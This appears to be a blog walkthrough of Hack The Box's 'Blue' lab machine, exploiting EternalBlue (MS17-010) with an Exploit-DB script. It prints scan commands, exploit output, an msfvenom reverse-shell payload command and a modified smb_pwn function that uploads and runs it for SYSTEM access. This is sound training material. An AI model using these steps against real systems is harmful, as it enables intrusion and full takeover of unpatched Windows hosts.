Post

Blue Walkthrough:Exploiting CVE-2017-0144

Walkthrough of HTB's Blue machine without using Metasploit

Blue Walkthrough:Exploiting CVE-2017-0144

Blue

Blue, while possibly the simplest machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.

Recon

Started the recon with an Nmap scan:

1
sudo nmap -T4 -sS -n -Pn --disable-arp-ping --stats-every=5s -F 10.10.10.40
  • -T4: Sets the timing template for faster scanning.
  • -sS: Performs a TCP SYN scan.
  • -n: Disables DNS resolution.
  • -Pn: Skips host discovery (pinging).
  • -F: Scans the top TCP ports.

The initial scan reveals several open ports, including:

  • 135/tcp open msrpc
  • 139/tcp open netbios-ssn
  • 445/tcp open microsoft-ds (Samba)
  • Multiple high-numbered ports (49152-49157) open for Microsoft services.

Next, I performed a more detailed scan to identify the operating system and versions of the services:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sudo nmap -T4 -A -Pn -n --disable-arp-ping 10.10.10.40 --source-port 53 -p 135,139,445,49152,49153,49154,49155,49156,49157

sudo nmap -v --script vuln,exploit -p 135,139,445 10.10.10.40
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

This identified the target as Windows 7 Professional 7601 Service Pack 1, making it susceptible to the EternalBlue exploit (MS17-010).

Exploitation:

MS17-010 is a critical vulnerability in SMBv1 (CVE-2017-0144). Exploiting it allows remote code execution with SYSTEM-level privileges.

Preparing the Exploit:

First, I copied the exploit script from the exploitdb directory to my working directory:

1
2
(kali㉿kali)-[~/Red_Team/HTB/Blue]
└─$ cp /usr/share/exploitdb/exploits/windows/remote/42315.py ./4315.py

The exploit is written in Python 2.7, and when I tried to run it, syntax issues arose due to the differences between Python 2.7 and Python 3. To resolve this, I created a Python 2.7 virtual environment:

  1. Download pip for Python 2.7:

    1
    2
    
     wget -c https://bootstrap.pypa.io/pip/2.7/get-pip.py
     python2.7 get-pip.py
    
  2. Verify the pip version and set up the virtual environment:

    1
    2
    3
    4
    5
    
     > python2 -m pip --version
     pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)
     > python2 -m pip install -U pip setuptools
     > python2 -m pip install virtualenv   
     > python2.7 -m virtualenv myenv
    
  3. Activate the virtual environment and install the required dependencies, like impacket, which is essential for running the exploit smoothly.

  4. Downloading Dependencies - Found a note of this missing library in the exploit,

    1
    2
    3
    
     EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
    
     > wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
    

Running the Exploit:

With the environment set up, I executed the modified script using Python 2.7:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
──(myenv)(kali㉿kali)-[~]
└─$ python Red_Team/HTB/Blue/4315.py 10.10.10.40 netlogon
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80041f95e0
SESSION: 0xfffff8a009713aa0
FLINK: 0xfffff8a00a10a088
InParam: 0xfffff8a00a10415c
MID: 0x2103
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done

The output indicated a successful exploitation process.

Knowledge Share:

SMB servers use named pipes to communicate with various services for authentication:

  • Domain-joined SMB Servers use the Netlogon service to communicate with the domain controller for authentication.
  • Standalone SMB Servers interact with the local SAM (Security Account Manager) database via the \samr pipe to verify credentials.
  • The Local Security Authority (LSA) manages security policies and access controls through its communication with the SMB server.

For testing purposes, running the command with random “username” and “password” can help in exploring these interactions during an exploit attempt.

Custom Exploit:

For a deeper understanding, I modified the EternalBlue exploit script to upload a custom reverse shell and execute it:

  1. Creating the executable payload using msfvenom:

    1
    
     msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=8080 -f exe > Benign.exe
    
  2. Modifying the script to transfer and execute the payload:

    1
    2
    3
    4
    5
    
     def smb_pwn(conn, arch):
         smbConn = conn.get_smbconnection()
         print('Creating file C:\\Benign.exe on the target')
         smb_send_file(smbConn, '/home/kali/Red_Team/HTB/Blue/Benign.exe', 'C', '/Benign.exe')
         service_exec(conn, r'cmd /c C:\\Benign.exe')
    
  3. Running the script gave me a reverse shell back to my machine, maintaining SYSTEM access.

Post-Exploitation:

After successful exploitation, I had SYSTEM-level access:

1
2
C:\Windows\system32> whoami
nt authority\system

This means complete control over the machine, including access to any files. Retrieving the flag:

1
2
C:\Users\Administrator\Desktop> type root.txt
734ac76b26b651a6658354572badeb63

Conclusion:

The Blue machine on Hack The Box is a great example of how a seemingly outdated vulnerability like EternalBlue can still pose a significant risk if left unpatched. Proper patch management and disabling legacy protocols like SMBv1 are critical for maintaining secure networks.

Disclaimer:

The techniques and tools discussed in this walkthrough are intended solely for educational purposes and to help improve cybersecurity awareness. Please conduct any penetration testing activities only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal and punishable by law. The author does not take responsibility for any misuse of the information provided

References

This post is licensed under CC BY 4.0 by the author.